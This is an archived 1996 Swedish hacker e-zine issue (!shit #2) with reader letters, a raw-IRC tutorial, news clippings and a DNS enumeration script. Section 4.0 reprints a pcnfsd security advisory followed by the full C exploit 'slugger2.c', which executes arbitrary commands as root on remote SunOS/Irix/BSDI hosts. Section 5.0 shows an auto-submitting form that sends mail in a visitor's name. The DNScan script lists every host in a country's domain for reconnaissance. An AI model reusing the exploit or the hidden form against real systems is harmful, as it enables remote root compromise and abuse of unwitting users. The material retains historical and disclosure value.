informis
/
textfiles
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
textfiles/magazines/SWEDISH/noshit2.txt

2003 lines
84 KiB
Plaintext
Raw Normal View History

Initial commit
2021-04-15 11:31:59 -07:00
#!/bin/more
____
/ \ ____ __ ____
\ /______/_ /_ ___/ /_
\ / _ / \ / _/
\/ __ \_/ __ / / /
Nummer #2 (hse/a) / \ \ \ /__/__/__/ Mars 1996
\__/_______/ desejerunte?
No idle, no gain
BRAINSTORM
Words, words, words 1.0
MAIL
Vi drar n<>gra lyckliga vinnare 2.0
fr<66>n m<>nadens posts<74>ck
IRC
IRC utan skyddsn<73>t: Raw-IRC Dead Socket 3.0
HACK
Bug i pcnfsd l<>ter dig exekvera Shellshock 4.0
kommandon som root
<20>ntligen <20>r den h<>r, DNScan 1.0 Shellshock 4.1
WWW
Kreativ Java-kodning htXs 5.0
NYTT 6.0
Etisk storst<73>dning p<> internet 6.1
Epost som att skicka hemlighet med vykort 6.2
Os<4F>kert l<>ta konsult sk<73>ta Malm<6C>polisens datahantering 6.3
Sex och politik bannlyst 6.4
Slutet f<>r de elektroniska klotterplanken 6.5
Netscapes kryptering bruten p<> nytt-med gammal metod 6.6
Storebror fumlar med lagb<67>ckerna 6.7
HD l<>t datakopierare beh<65>lla utrustning 6.8
Lucka i lagen skyddar piratkopior 6.9
SURF
<20>r Mitnick en <20>berhacker eller en htXs 7.0
luser, avg<76>r sj<73>lv
MISC
Riksspolisstyrelsen p<> Internet Broken Pipe 8.0
En sysadmins samvete CB 8.1
-----------------------------------------------------------------------
Ord g<>r ut till bes<65>ttningen p<> #hack.se f<>r hj<68>lp med distributionen
-----------------------------------------------------------------------
(C)opyright?
/* -------------------------------------------------------------
All information i !shit publiceras endast i studiesyfte
och som underh<72>llning.
Artikelf<6C>rfattarna i !shit <20>r inga f<>rebilder. De <20>r inte ens
m<>nskliga. De <20>r hackers. Vissa saker de g<>r kan f<> en
person skadad, relegerad, arresterad, m<>jligtvis utvisad.
F<>r att uttrycka det hela p<> ett annat s<>tt:
Don't try this at home.
------------------------------------------------------------- */
___ ___ __ __ __ _ __ ____ ___ ___ _ __
___ | _)| )/ | | \ |( _|_ _) _ \ ) V | _____________________________
1.0 |____)_)_\_|_|__|_\__|___)|__|\___/_)_\_v__|
Sedan den f<>rra och f<>rsta filen vi s<> g<>rna kallar !shit tr<74>ffade gatorna har
jag b<>rjat dra mig f<>r att visa mig p<> irc. Jag kan f<>rst<73> att v<>ra texter
fungerar som ett livselexir f<>r vissa, men ingen kan vara s<> beroende av detta
alster att det ber<65>ttigar att fr<66>ga mig *varje* dag n<>r n<>sta nummer kommer.
Artiklar kommer in l<>pande, och nya nummer kommer att sl<73>ppas s<> fort det
finns tillr<6C>ckligt med material f<>r att r<>ttf<74>rdiga det. Allts<74> kommer varje
release sporadiskt, och jag varken vill eller kan veta n<>r det blir. S<>,
det tj<74>nar inget till att *tjata*. Ok?
Detta <20>r inte ett angrepp p<> *alla* som fr<66>gat hur det g<>r med #2, tv<74>rt om
<EFBFBD>r det givetvis trevligt att veta att det finns en efterfr<66>gan p<> det vi g<>r.
Bara det finns m<>tta. Hoppas vi lyckats leva upp till f<>rv<72>ntningarna.
Kanske inte som en blixt fr<66>n klar himmel har det uppst<73>tt en hel del ideer
om hur !shit skall uttalas. Om dessa ideer faktiskt <20>r missf<73>rst<73>nd l<>ter
jag vara osagt eftersom det tvivell<6C>st inte finns en absolut sanning i denna
vetenskap. Men som en spark i r<>tt riktning f<>r den skara som inte alls kan
ta till sig betydelsen av utropstecknet i namnet, vill jag citera manfilen
f<EFBFBD>r bourne-shell: "! Unary negation operator". Nog om detta.
L<EFBFBD>t artiklarna och synpunkterna forts<74>tta fl<66>da till: noshit@alpha.c2.org
__ __ __ __ _
___ | V |/ | | |_ _______________________________________________________
2.0 |__v__|_|_|__|___| fr<66>n /usr/lib/snedmail
Tyv<EFBFBD>rr kan vi av utrymmessk<73>l inte ta med alla brev som vi f<>tt, men vi
uppskattar dem inte mindre f<>r det. Fors<72>tt skriva! H<>r kommer n<>gra smakprov
som ganska bra representerar majoriteten av v<>r brevsk<73>rd.
Date: Thu, 04 Jan 96 19:14:00 +0200
From: Phoo
Subject: tack... sn<73>llt..
Tack s<> mkt f<>r att du gjort mig k<>nd i ditt "fina" zine !SHIT...
mkt trevligt.. nu kommer jag f<>rmodligen bli tvungen att byta nick..
fan ta dig.. :(
annars s<> d<>g !shit n<>stan... kommer det fler nummer eller?
vart kommer man f<> tag i skiten? l<>gg upp det p<> n<>n ftp...
|| -Phoo- of AiP
\__/
* SLMR 2.1a *
-------------------------
Date: Fri, 05 Jan 96 16:19:00 +0200
From: SPiFf
Subject: Lama..
Hohoooo... Jag l<>ste just "din" tidning !shit, vilket faktiskt
sammanfattar den r<>tt bra... Shit.. Fukk, den suger kuk.. Kan du inte
g<>ra en b<>ttre tidning s<> g<>r ingen alls.. Du verkar tro att man <20>r
ELiTe f<>r att man anv<6E>nder lite freakiga versaler/gemener.. Jag <20>r fan
s<>ker p<> att du inte ens <20>r n<>n pirater <20>.h.t. Du <20>r bara en liten Lama
som sitter och skriver mesiga sm<73> E-ZiNes...
Elite Commandments:
-------------------
1] Never admit you have no idea what
you're talking about.
(Den tar du bokstavligt)
2] Never have a good word to say about
anyone else but yourself.
(Wow.. Den f<>ljer du ocks<6B>)
3] Join every group that will let you
join. After a few weeks have passed,
quit & claim they aren't good enough
to merit your prescence.
(Hee.. Pook..)
4] Always shift the blame to someone
else. "It's not my fault" should
become 2nd nature to you.
(Humm....)
5] Always have nasty things to say
about your so called friends behind
their backs.
6] Hate as many people as possible.
(Du har v<>nt p<> den, "f<> s<> m<>nga som m<>jligt att hata dig")
7] Start as many rag wars as humanly
possible. When your up against
intelligent people (As on Adventurers
Tavern, 1982-1986. RIP), and losing
your end of the war. Say "This is
stupid and childish, even if I did
start it", and stop posting.
8] When someone becomes pushy and openly
challenges your lack of knowledge
about something. Say "I know the
answer, but you're not elite enough,
so I can't tell you".
(Haha.. r<>tt i prick)
9] If anyone still dares to question you
then threaten them with tough things
like getting someone to turn their
phones off, or charge 10 billion
toilets on their mothers credit card.
(It doesn't matter whether or not you
actually know how to do this, or know
anyone else who will do it for you.
This is a favorite tactic of ELITE!@
phreak groups like L0D!!@#1!.) If all
else fails began chanting "Cable
throw, Cable throw, Cable throw" or
if you are a pirate: make a fright-
ening rag page on them in your next
Copya crack.
[Warning: Be sure to only use this on a
fellow ELITE!@#1! phreak, pirate or
equivalent ignorant person. Anyone else
will laugh at you & tell you to fuck
off. Only adding to the questioning
of your massive eliteness.]
10] Make as big a fool of yourself as
is possible. Display your ignorance
and stupidity in a manner that will
make itself noticible to the modem
community at large. If you are a
aspiring elite pirate, get your
name on as many copya cracks as
fast as possible. Or if you are a
up and coming elite phreak, start
up your own little world (or join
someone else who has already done
this, such as LOD), refuse to see
anyones viewpoint but your own, &
declare yourselves mega-elite.
F<>ljer du bara dom h<>r reglerna eller? Fukk.. Och sen, n<>r du b<>rjar ta
pHOo som exempel p<> en lama, s<> <20>r du ganska l<>ngt ute i skogen. Har du
inte h<>rt talas om pHOo s<> vet jag fan inte var du har varit de
n<>rmaste m<>naderna.. Under en sten? =)
En sak till; p<> din lilla SuRf lista (Vem fan anv<6E>nder ordet surfa
<20>nd<6E>? L<>ter som aftonbladet "S<> h<>r surfar du p<> n<>tet..") Duh..
Iaf, inte en enda FTP fanns med, alla kanske inte gillar att sitta och
se en massa fina bilder och menyer som p<> WWW, jag f<>rst<73>r att
W95-luserz som du kanske gillar det, men de flesta vill ha FTPs n<>r man
ska ladda hem prylar.. Ut och smurfa med dig...
Jaja, forts<74>tt knapra p<> dina sm<73> floppiez och skriv din ZiNe, men tro
inte att n<>n bryr sig... Iaf inte jag, the almighty SPiFf... =)
Fuck ELiTe, go ShareWare... NOT NOT NOT NOT NOT NOT!!!!!! =)
/EL SPiFf of AiP Rokxz da funkie Joint....
* SLMR 2.1a *
__ ___ ___
___ | | ) __) _____________________________________________________________
3.0 |__|_)_\___) Raw-IRC, av Dead Socket
Du har precis hackat ns.tip.net och k<>nner att du beh<65>ver bes<65>ka #hack.se
f<EFBFBD>r att skryta med din er<65>vring. Men det finns givetvis ingen irc-klient p<>
ns.tip.net. Vad g<>r du nu?
Min rekommendation <20>r att du kollar i Gula Sidorna under P f<>r psykolog. Inte
i helvete <20>r du v<>l s<> dum att du anv<6E>nder ns.tip.net f<>r att irca? Kom igen!
Allvarligt talat, s<> <20>r protokollet mellan klient och server baserat p<>
kommandon som skickas i klartext, och det hela <20>r mycket enkelt och raktfram.
Att hoppa <20>ver klienten och ansluta sig direkt till servern kallas ibland f<>r
raw-irc. Det <20>r inte sv<73>rare <20>n en telnet till din favoritserver p<> port 6667
och att f<>lja dessa enkla instruktioner.
beavis> telnet irc.nada.kth.se 6667
Trying 130.237.226.10...
Connected to mumrik.nada.kth.se.
Escape character is '^]'.
Det f<>rsta som h<>nder n<>r du kopplar upp dig mot port 6667 <20>r att irc-servern
f<EFBFBD>rv<EFBFBD>ntar sig viss information om dig. B<>rja med att skriva;
NICK IvilHaxor
...eller vilken nick du nu vill anv<6E>nda. D<>refter m<>ste du ange ditt konto,
host- och servername, samt ditt "riktiga" namn. F<>lten f<>r hostname och
servername ignoreras, s<> d<>r kan du skriva vad som helst. Syntaxen <20>r:
USER ivilhax hostname servername :Da iViL 0nE
Om nicken inte <20>r upptagen s<> kommer du att se ditt v<>lkomstmeddelande som
indikerar att du <20>r inne. Nu kan du anv<6E>nda alla dina vanliga kommandon typ
JOIN, PART, MODE, osv.
JOIN #hack.se
:ivil!~ivil@enemy.public.se JOIN :#hack.se
:irc.nada.kth.se 353 ivil @ #hack.se :ivil @shshock @TheK @blur @Chaoz tcm @E-114 chaotic @acdhead @thk psyched
:irc.nada.kth.se 366 ivil #hack.se :End of /NAMES list.
Det som <20>r annorlunda <20>r hur du skriver till en channel eller skickar msg's.
B<EFBFBD>da delarna g<>r du med PRIVMSG enligt f<>ljande:
PRIVMSG #hack.se :w0rdawp, wassup?
PRIVMSG shshock :n4r k0mm3r !shit #2, d00d?
Om du <20>r inaktiv kommer du att f<> upp ett PING-meddelande. Typ:
PING :irc.nada.kth.se
Det m<>ste du svara p<>, annars kommer du att bli nedkopplad. Skriv:
PONG :irc.nada.kth.se
Sv<EFBFBD>rare <20>n s<> <20>r det inte. Om du vill ha mer information om irc-protokollet
s<EFBFBD> finns det beskrivet i RFC1459.
_ __ __ ___ _ __
___ | L |/ | _| / / _______________________________________________________
4.0 |_||_|_|_|___|_|_\
Avalon Security Research
Release 1996.1
(pcnfsd)
Affected Program: rpc.pcnfsd
Tested Operating Systems: SunOS 4.1.X, Linux
Affect: Remote attackers may execute an arbitrary command as root on
the target machine.
Bug Synopsis:
rpc.pcnfsd's run_ps630 function does not correctly validate it's
arguments. This allows us to trick rpc.pcnfsd into running a command
other than ps630.
Fix:
The the run_ps630 function does not seem to be needed. Removing
the only call to it in pr_start (pcnfsd_print.c) should remove this
vulnerability.
Exploit Information:
Exploit code will be posted to the ASR mailing list exactly one week
from the release of this advisory.
Notes:
Although the rpc.pcnfsd bundled in all Linux distributions is
vulnerable. Is appears to be exceedingly difficult to exploit this
vulnerability under Linux. ASR welcomes and appreciates information
on the action of this vulnerability in other operating systems.
Sedan denna advisory sl<73>pptes har det gjorts fler tester, och buggen verkar
inte vara m<>jlig att utnyttja under Linux. Dock har vi kunnat bekr<6B>fta att
SunOS 4.x, Irix och BSDI <20>r s<>rbara.
Ta hem sourcen till pcnfsd fr<66>n bcm.tmc.edu:/pcnfs/pcnfsd.93.02.16.tar.Z och
kompilera nedanst<73>ende program f<>r att testa om din pcnfsd <20>r s<>rbar. Om du
har m<>jlighet att g<>ra tester under n<>got annat OS <20>n ovan n<>mnda s<> <20>r vi
mycket intresserade av resultatet. Skicka info till shshock@alpha.c2.org.
-----------------8<-- klipp h<>r -----------------------------------------------
/* slugger2.c
* By Josh D. November 1st 1995 AD
* rewritten January 31st 1996 AD
* compile w/ pcnfsd_clnt + pcnfsd_xdr + rpcsvc
* usage: slug2 target 'command'
* where:
* slug2 is this program.
* target is the target host
* 'command' is a bourne shell command within single quotes *and*
* with the slash chr ('/') substituted with the A environment
* variable: e.g. 'touch ${A}filename' would equate to
* 'touch /filename'.
* caveat:
* The command is limited to 27 charactars.
* Using shell meta-charactars (!#$^&*()<>[] etc etc) in your command
* will cause the exploit to fail.
* If rpc.pcnfsd was started from the rc scripts (as opposed to inetd)
* which it usually is: it will die after one succesful run of this
* program.
* The rpc calls this code makes always fail and print the error code:
* '137' <<---- See 'wierd ass error' below.
* This code always times out ont it's pr_start call because rpc.pcnfsd
* dies before it gets a chance to reply. This fix for this is
* to make to timeout value very small for the pr_start call.
*
* **********************************************************************
*
* This code is provided for educational purposes only.
* Neither Josh D. nor ASR take any responsibility for the use
* or misuse of this code.
*
*/
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <errno.h>
#include <arpa/inet.h>
#include <string.h>
#include <strings.h>
#include <stdio.h>
#include <stdlib.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include <netinet/in.h>
#include "pcnfsd.h" /* this should be created by rpcgen */
int main(argc, argv)
int argc;
char **argv;
{
char myhost[200];
int gids[8];
struct hostent *dahent;
struct sockaddr_in daserver;
CLIENT *datsme;
struct pr_init_args daargs;
struct pr_init_res *dares;
struct pr_start_args fags;
struct pr_start_res *figs;
char daprinter[65];
char dadir[65];
char dapath[255];
struct timeval tout;
int ranysock=RPC_ANYSOCK;
tout.tv_sec=60;
tout.tv_usec=0;
if (argv[3] != NULL && argv[4] != NULL)
{ printf("bad arguments\n");
exit(1);
}
if (strlen(argv[2]) > 27)
{ printf("command must be less than 27 chars\n");
exit(1);
}
/* this must be a valid printer */
strcpy(daprinter, "lp");
daserver.sin_family = AF_INET;
daserver.sin_port = 0;
dahent = gethostbyname(argv[1]);
if (dahent == NULL)
{ printf("gethost failed.\n");
exit(1);
}
bcopy(dahent->h_addr, &daserver.sin_addr.s_addr, 4);
datsme = clntudp_create(&daserver, 150001, 1,
tout, &ranysock);
clnt_control(datsme, CLSET_TIMEOUT, &tout);
gids[0]=0;
gids[1]=1;
datsme->cl_auth = authunix_create(myhost, 0, 0, 2, gids);
sprintf(dapath, "..${A:=$HOME}..$A..${A}bin${A}sh -c \"%s\" ", argv[2]);
daargs.pia_client = dapath;
daargs.pia_printername = daprinter;
/* Wierd ass error:
whenever we pub '"' in a string for pr_init/pr_start rpcsvc
seems to break.
This doesn't imapir the effects of the exploit, it simply
doesn't allow us to see any errors pcnfsd returns. I don't
plan on fixing this. */
/* simple minds.... */
if ( (dares = pcnfsd_pr_init_1(&daargs, datsme)) == NULL)
{ printf("137\n"); }
else
{ if (dares->pir_stat == PI_RES_OK)
printf("Success\n");
if (dares->pir_stat != PI_RES_OK)
{ printf("Error: ");
switch(dares->pir_stat)
{
case PI_RES_NO_SUCH_PRINTER :
printf("No such printer\n");
break;
case PI_RES_OK :
printf("Result Ok\?\?\n");
break;
case PI_RES_FAIL :
printf("Generic Failure\n");
break;
default :
printf("Unknown Error\n");
}
}
}
fags.psa_client = ".";
fags.psa_printername = daprinter;
fags.psa_username = "root";
fags.psa_filename = dapath;
fags.psa_options = (argv[3] == NULL) ? "d ;> " : "d ;< ";
/* simple pleasures */
figs = pcnfsd_pr_start_1(&fags, datsme);
if (figs == NULL)
{ printf("137\n");
exit(1);
}
}
-----------------8<-- klipp h<>r -----------------------------------------------
4.1
Universalverktyget f<>r dom<6F>nfr<66>gor
DNScan
F<EFBFBD>r ett tag sedan s<> ville jag lista alla burkar med DNS-entries f<>r ett helt
land, och ins<6E>g att det inte l<>t sig g<>ras enkelt. S<> jag hackade ihop en
liten utility f<>r det, och gav den till n<>gra kompisar p<> #hack.se och bad
att de inte skulle sprida den vidare tills det att jag hade en f<>rdig och
bugtestad version klar.
Mindre <20>n en vecka senare b<>rjade jag f<> mail fr<66>n st<73>llen s<> l<>ngt bort som
Malaysia som tackade f<>r att jag skrivit ett s<>dant anv<6E>ndbart verktyg.
Hmm...
Tyngd av ansvaret att folk faktiskt anv<6E>nder mitt lilla script har jag nu
fixat de buggar som fanns och f<>tt fram en version 1.0 som jag v<>gar st<73> f<>r.
H<EFBFBD>ll till godo.
-----------------8<-- klipp h<>r -----------------------------------------------
#!/bin/sh
#
# DNScan 1.0 by Shellshock (shshock@alpha.c2.org)
#
# Directory for temporary files
TMPDIR=.
# Name of lockfile for -file mode
LOCKFILE=$TMPDIR/dnscan.lock
# Set default parameters to nslookup, 2 retries with a timeout of 10 secs
PARAMS="-retry=2 -timeout=10"
# Print usage information
usage()
{
more << end-of-text
Usage: dnscan [-quiet] [-file <filename>] [-domain <domain>] [-sub <subdomain>]
-quiet Useful when piping to a file while running in the background.
-file Use <filename> as a list of subdomains and servers to scan.
-domain List all servers in a first level domain like .uk or .no.
-subdomain List all servers in a subdomain.
DNScan usually generates alot of output, so you probably want to pipe the
output to a file. Some messages will still be sent to you terminal to keep
you informed of whats going on, unless you use -quiet.
The -domain mode will first create a file called 'domain.<domain>' with a
list of all subdomains and their name servers, and then use that file in
the -file mode. It will not work with the com, edu, mil, gov, net or org
domains, because there is no single name server that will list these.
If you want to create your own file to run in the -file mode, each line of the
input file needs to have the following format:
<domain> <subdomain> [<dns>]
* To list all servers in Japan, do "dnscan -domain jp".
* To list all servers in the netcom domain, do "dnscan -sub netcom.com".
* To find Sun boxes at swipnet, do "dnscan -sub swip.net | grep -i sun".
I've found that sometimes nslookup hangs on a query. Just find nslookup with
ps and kill it, and the scan will continue with the next subdomain.
end-of-text
}
### Strip away all unwanted lines from the output of the 'ls -d', that is:
### - all server names ending with a dot, they are probably in another domain
### - all references to localhost (127.0.0.1)
### - all lines not of the type A or HINFO
clean_serverlist()
{
sed -n " {
/^.*\. /d
/127.0.0.1$/d
/ A /s/^ /$SUBDOMAIN /p
/ HINFO /s/^ /$SUBDOMAIN /p
} " | sort -u
}
### List the name servers handling the selected subdomain
list_subdomain_dns()
{
echo "$SUBDOMAIN" | nslookup -querytype=ns $PARAMS |\
sed -n 's/.*nameserver = //p'
}
### Print a formated list of servers (recordtypes A and HINFO) in a subdomain
### If we don't already have selected a name server, take the first in the
### list from list_subdomain_dns, or even better use one that is actually
### within the subdomain
list_subdomain()
{
if [ -z "$DNS" ]; then
DNS=`list_subdomain_dns | grep -i $SUBDOMAIN\$ | sed -n 1p`
[ $DNS ] || DNS=`list_subdomain_dns | sed -n 1p`
[ $QUIET ] || echo "Using name server $DNS for *.$SUBDOMAIN" >&2
fi
echo "ls -d $SUBDOMAIN" | nslookup $PARAMS - $DNS | clean_serverlist
}
### Scan all subdomains listed in a file
from_file()
{
while read domain subdomain DNS; do
[ $domain ] || continue
SUBDOMAIN=$subdomain.$domain
# If POS is set, we are continuing an interrupted scan
if [ $POS ]; then
[ $SUBDOMAIN != $POS ] && continue
unset POS
fi
[ $QUIET ] || echo "Scanning $SUBDOMAIN" >&2
# Write infile and subdomain to a lockfile, so that we
# later can continue the scan if we get interrupted
echo "$INFILE $SUBDOMAIN" > $LOCKFILE
list_subdomain
echo
done < $INFILE
}
### Strip away all but the NS lines from the output of the 'ls -d' and sort
### Also filter server names ending with a dot, and prepend the domain name
### first on each line
clean_dnslist()
{
sed -n " {
/^.*\. /d
s/^ /$DOMAIN /
s/ NS / /p
} " | sort -u +1 -2
}
### List all the name servers handling the selected domain
list_domain_dns()
{
( echo root; echo "$DOMAIN." ) |\
nslookup $PARAMS -querytype=ns -domain=$DOMAIN |\
sed -n 's/.*nameserver = //p'
}
### List all name servers in the selected domain
list_domain()
{
DOMAINFILE=domain.$DOMAIN
# Use first name server in the list for the domain
domain_dns=`list_domain_dns | sed -n 1p`
[ $QUIET ] || echo "Using name server $domain_dns for *.$DOMAIN" >&2
# Create a file with all subdomains and their name servers, and then
# switch to -file mode
echo "ls -d $DOMAIN" | nslookup $PARAMS - $domain_dns |\
clean_dnslist > $DOMAINFILE
MODE=file
INFILE=$DOMAINFILE
from_file
}
### Parse flags
unset QUIET
while [ -n "$1" ]; do
case "$1" in
-quiet) QUIET=true
;;
-file) MODE=file
INFILE=$2
shift
;;
-domain) MODE=domain
DOMAIN=`echo $2 | sed 's/^\.//'`
shift
;;
-sub) MODE=subdomain
SUBDOMAIN=`echo $2 | sed 's/^\.//'`
shift
;;
*) usage
exit
;;
esac
shift
done
### Look for previously interrupted scan
if [ -f $LOCKFILE ]; then
echo "Continue previously interrupted scan [n]? \c" >&2
read r
if [ `echo x$r | grep -i "^xy"` ]; then
read INFILE POS < $LOCKFILE
[ $POS ] && MODE=file
fi
[ $QUIET ] || echo >&2
fi
### Present ourself
[ $QUIET ] || ( echo "DNScan 1.0 by Shellshock"; echo ) >&2
### Select mode
case $MODE in
file) from_file
;;
domain) list_domain
;;
subdomain) list_subdomain
;;
*) usage
exit
;;
esac
### Clean up the temporary file we have created
rm $LOCKFILE 2>/dev/null
__ __ __ __
___ \ \/\/ /\/\/ /\/\/ / _____________________________________________________
5.0 \_/\_/\_/\_/\_/\_/ Kreativ Java-kodning, av htXs
Debatten om vad n<>gon med ont upps<70>t kan st<73>lla till med, med hj<68>lp av Java
<EFBFBD>r i full g<>ng. Redan finns det ett par ganska skr<6B>mmande (eller upplyftande,
beroende p<> vem man <20>r) f<>rslag:
Ta f<>ljande lilla script till exempel.
<body onload="document.mailme.submit()">
<form method=post name=mailme
action="mailto:noshit@alpha.c2.org?subject=n4r k0mmer numm3r 2?">
<input type=hidden name="noshit" value="bullshit">
</form>
<img src=/pics/bigones.gif>
</body>
N<EFBFBD>r du tror att du endast tittar p<> en helt oskyldig sida med en GIF-bild p<>,
s<EFBFBD> skickas i sj<73>lva verket ett mail till noshit@alpha.c2.org, i *ditt* namn,
i <20>gonblicket som du <20>ppnar sidan.
http://www.popco.com/grabtest.html
Eller vad s<>gs om ett script som g<>mmer sig i bakgrunden, och varje g<>ng du
g<EFBFBD>r till en ny URL s<> rapporteras det tillbaka till servern d<>r du "plockade
upp" det elaka scriptet?
http://www.osf.org/~loverso/javascript/track-me.html
Det tredje och kanske v<>rsta exemplet <20>r ett script som listar ett bibliotek
eller en fil p<> din h<>rddisk, och skickar iv<69>g resultatet. Om du skulle
starta Netscape som root inneb<65>r att din /etc/shadow helt pl<70>tsligt kan
plockas fr<66>n din dator, utan att du m<>rker det!
http://www.osf.org/~loverso/javascript/dir.html
Brendan Eich fr<66>n Netscape lovade (inofficiellt) f<>ljande 29/2 f<>r att
l<EFBFBD>sa ovanst<73>ende s<>kerhetsproblemen med Java:
"We're fixing directory listing and mail spamming, plus adding a Preference
to disable JavaScript, in a special 2.01 release that's about to supercede
2.0. Also in the Gold release, and (of course) in the "next release"
(3.0b1, I believe)."
Hmm...
__ _ _ _ ____ __
___ | \ | ) |_ _) ) _______________________________________________________
6.0 |_\__|_ |__|__| Nyhetsklipp fr<66>n januari och februari
(___/
---------------------------------------------------------------------------
6.1 Dagens Industri, 951230 Etisk storst<73>dning p<> internet
---------------------------------------------------------------------------
Det finns mycket skr<6B>p p<> det internationella datan<61>tet
internet. Lika illa <20>r det med de speciella databaser som g<>r
under beteckningen BBS, elektroniska anslagstavlor. Information
som snarast <20>r desinformation presenteras som om de vore nyttiga
nyheter. Men nu <20>r det dags f<>r etiska spelregler.
Det ska bli slut p<> den elektroniska milj<6C>f<EFBFBD>roreningen - de
svenska IT-f<>retagens branschorganisation Sito g<>r till attack
och uppmanar sina medlemmar att stoppa oetisk information. Jag
tror att branschen kan sanera sig sj<73>lv, s<>ger Hans Iwan Bratt,
VD f<>r Sito i Stockholm.
Med v<>ra nya regler om ansvar f<>r elektronisk information skapar
vi n<>got som n<>rmast liknar de pressetiska reglerna. Det vore
olyckligt med stelbent lagstiftning, en lagstiftning som <20>nd<6E>
inte skulle ge effekt.
Hotas med uteslutning
Sitos medlemsf<73>retag blir skyldiga att f<>lja de stundande etiska
aff<EFBFBD>rsreglerna f<>r elektronisk information. Den som bryter mot
dem utesluts ur branschorganisationen.
Hans Iwan Bratt anser att de stora problemen med skr<6B>pinformation
handlar om d<>lig och f<>r<EFBFBD>ldrad information. Det f<>rekommer ocks<6B>
obehagliga f<>rf<72>ljelser mot privatpersoner och folkgrupper p<>
s<EFBFBD>v<EFBFBD>l internet som p<> vissa BBS-adresser. D<>remot tycker Hans
Iwan Bratt att spridningen av barnpornografi f<>tt allt f<>r stor
publicitet: Det <20>r ett ytterst litet problem med f<> akt<6B>rer och f<>
intresserade. Personf<6E>rf<72>ljelser och sabotage av olika slag <20>r
betydligt allvarligare f<>r internets rykte.
Ett vanligt sabotage <20>r s<> kallad bombning: en misshaglig person
eller akt<6B>r p<> internet f<>r s<> mycket elektronisk post att
dennes elektroniska brevl<76>da kollapsar. Resultatet blir ofta att
personen eller operat<61>ren f<>r st<73>nga sin anslutning till
internet. I USA har t ex militanta kvinnogrupper bombat
internetsidor som visar porr- och fotomodeller.
Risk f<>r pestst<73>mpel
Enligt Hans Iwan Bratt l<>per internet stor risk att f<> samma
pestst<EFBFBD>mpel som 071-numren fick f<>r n<>gra <20>r sedan. Det hotar
den kommande kommersiella utvecklingen av internet och d<>rf<72>r
reagerar branschen.
Svag organisation
Sito hette tidigare LKD och samlar 250 medlemsf<73>retag med en
total oms<6D>ttning p<> 100 miljarder kronor - 90 procent av
branschens totaloms<6D>ttning. <20>nd<6E> anses Sito vara en relativt
svag branschorganisation; flertalet IT-f<>retag <20>r sm<73>f<EFBFBD>retag som
inte <20>r med men som <20>nd<6E> agerar p<> internet eller BBS. Det <20>r
dessutom i praktiken om<6F>jligt att f<>rbjuda information p<>
internet utan att kapa f<>rbindelserna med omv<6D>rlden. F<>rbjuds
tex stark<72>lsreklam p<> internet i Sverige s<> kan informations-
l<EFBFBD>mnaren flytta till utlandet med n<>gra enkla handgrepp vid
datorn.
---------------------------------------------------------------------------
6.2 TT, 960123 Epost som att skicka hemlighet med vykort
---------------------------------------------------------------------------
Datas<61>kerheten p<> svenska f<>retag och myndigheter <20>r ofta
skr<EFBFBD>mmande d<>lig.
Sekretessbelagda uppgifter om privatpersoner, till exempel
sjukjournaler, straffregister och annat g<>r i klarskrift <20>ver
internet. Hemlig f<>retagsinformation s<>nds utan skydd.
-Det <20>r som att skicka hemligheter med vykort, s<>ger
dataexperten Tommy Pedersen.
Han har jobbat med datas<61>kerhet i sex <20>r och b<>rjar bli ganska
luttrad. S<>kerhetsbristerna <20>r ofta h<>pnadsv<73>ckande. P<> tisdagen
pratade han s<>kerhet p<> ett seminarium vid en fackm<6B>ssa f<>r tele-
kommunikationer p<> Svenska M<>ssan i G<>teborg.
D<>r, p<> Telecom Scandinavia, var det de tekniska nymodigheterna
och alla sp<73>nnande m<>jligheter de ger, som var huvudtemat. I
Tommy Pedersens v<>rld finns <20>ven den m<>rka sidan av utvecklingen,
den som kan anv<6E>ndas f<>r industrispionage och som kan hota
m<EFBFBD>nniskors personliga integritet. F<>r den som vill leta <20>r det
inga problem att till exempel sortera i epost-h<>garna p<>
internet.
Bara att ta fram
Speciella program hj<68>lper snokaren att leta och tar bara fram
det han eller hon <20>r intresserad av.
-Det <20>r fritt fram f<>r den som vill spionera, s<>ger Pedersen.
Han arbetar f<>r ett f<>retag som heter Sectra AB i Link<6E>ping och
som levererar krypteringsutrustning f<>r datakommunikation till
svenska f<>rsvaret. D<>r finns medvetenheten. P<> privata marknaden
och bland myndigheterna <20>r vakenheten s<>mre.
-Datainspektionen borde f<> st<73>rre resurser, framf<6D>r allt n<>r
det g<>ller tekniker, s<>ger Tommy Pedersen. Han har sett strikt
privata, sekretessbelagda personuppgifter g<> helt <20>ppet p<> n<>tet.
F<>retag, som l<>gger stora summor p<> elektroniska <20>vervaknings-
system, vaktutbildning och sv<73>rforcerade st<73>ngsel, skickar just
den f<>retagsinformation man vill skydda utan minsta sekretess.
Som vykort, enligt Pedersen.
-Hade de legat i kuvert s<> hade man <20>tminstone haft det lilla
skyddet f<>r hemligheterna.
Bristerna finns p<> alla niv<69>er, <20>ven hos stora svenska
multinationella f<>retag. S<>dana som borde veta b<>ttre.
Inte dyrt att skydda
Tekniken f<>r att kryptera och skydda informationen har funnits
l<EFBFBD>nge och <20>r heller, enligt Pedersen, inte speciellt dyr.
Problemet <20>r snarare att f<> beslutsfattarna att f<>rst<73>.
-S<>kerhetscheferna p<> f<>retagen har ofta sin bakgrund i vad man
kan kalla fysisk s<>kerhet. Kommunikationerna <20>r teknikernas sak,
s<EFBFBD>ger Pedersen.
I Sverige finns det en handfull f<>retag som sysslar med
s<EFBFBD>kerhetsfr<EFBFBD>gor. I utlandet, till exempel Italien och England,
<EFBFBD>r branschen betydligt mer utbyggd. Antalet databrott har
tvingat fram medvetenheten.
---------------------------------------------------------------------------
6.3 TT, 960124 Os<4F>kert l<>ta konsult sk<73>ta Malm<6C>polisens datahantering
---------------------------------------------------------------------------
Rikspolisstyrelsen (RPS) har f<>rbjudit l<>nspolism<73>staren i Malm<6C>,
Hans Wranghult, att l<>ta en utomst<73>ende konsult ta hand om
myndighetens hela datahantering.
-En kov<6F>ndning och dessutom inkonsekvent eftersom RPS ocks<6B>
anv<EFBFBD>nder konsulter, menar en besviken Wranghult.
Det handlar inte om kostnaden. I st<73>llet h<>nvisar RPS till
s<EFBFBD>kerhetsaspekten i beslutet att stoppa Malm<6C>polisens
konsultplaner.
Det som Malm<6C>polisen planerat kallas i datakretsar f<>r
"outsourcing". Det inneb<65>r att hela dataverksamheten,
hanteringen av allt fr<66>n spaningsuppgifter till bokf<6B>ring,
